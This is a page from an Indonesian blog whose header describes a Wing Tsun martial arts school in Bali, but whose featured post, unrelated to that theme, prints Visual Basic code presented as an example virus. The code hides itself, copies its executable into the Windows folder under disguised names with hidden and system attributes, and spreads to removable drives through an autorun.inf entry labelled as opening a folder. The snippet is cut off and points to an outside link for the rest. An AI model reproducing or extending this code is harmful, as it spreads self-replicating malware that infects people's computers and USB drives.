Wing Tsun Bali
![Wing Tsun Bali](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmpKaQm4jwV1Rr9zi4Ax2p8aVnQeRBBgsSv2hOzbw9FUD3ABd6akifYvq5ozwvn_-pmdUuc8X4qJ1or9Vp0pL19EOF6vgRO0M2PwA9fxvPChVY2BnlC0NSMqz1TTK81oDUJgpX3t72FQk/s1600/FB_IMG_1526140003308.jpg)
Blog ini akan di fokuskan untuk memuat informasi seni beladiri wing chun (umum) dan mendetail ke intern PERGURUAN WING CHUN di Bali, salah satunya adalah Perguruan WING TSUN BALI SURYA DEWATA (WTBSD) disini penulis merupakan murid resmi perguruan WING TSUN BALI sejak akhir Oktober 2011, dan aktif sampai saat ini
Featured
CONTOH coding buat virus dlam visual basic
Public Class Explorer
Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick
On Error Resume Next
ShowInTaskbar = False
Dim fs, virus, flashdrive, tf, atr, rg, sys32
Dim flashdrive1 As String
Dim winpath As String
fs = CreateObject("Scripting.FileSystemObject")
winpath = fs.getspecialfolder(0).path & "\ssms.exe"
virus = Application.ExecutablePath
sys32 = fs.getspecialfolder(0).path & "\csrs.exe"
My.Computer.FileSystem.CopyFile(virus, winpath, True)
My.Computer.FileSystem.CopyFile(virus, sys32, True)
tf = fs.getfile(winpath)
tf.attributes = 39
tf = fs.getfile(sys32)
tf.attributes = 39
For Each flashdrive In fs.drives
If (flashdrive.drivetype = 1 Or flashdrive.drivetype = 2) And flashdrive.path <> "A:" Then
flashdrive1 = flashdrive.path & "\perawan.exe"
My.Computer.FileSystem.CopyFile(virus, flashdrive1, True)
tf = fs.getfile(flashdrive.path & "\perawan.exe")
tf.attributes = 39
atr = "[autorun]" & vbCrLf & "open=perawan.exe" & vbCrLf & "shell\open\command=perawan.exe" & vbCrLf & "action=Open folder to view files" & vbCrLf & "shell\Explore\command=perawan.exe"
tf = fs.createtextfile(flashdrive.path & "\autorun.inf", True)
tf.write(atr)
tf = fs.getfile(flashdrive.path & "\autorun.inf")
tf.attributes = 39
End If
Dim ss As Object
Dim obj As Object
ss = CreateObject("wscript.shell")
Untuk selengkapnya kunjungi ling aslinya ya
http://xphreaktechnospot.blogspot.com/2010/12/ne-contoh-virus-dengan-visual-basic.html
Comments
Manstap bro,, ne blog baru aq...
ReplyDeletehttp://techno-wonder.blogspot.com
ok brodha
ReplyDelete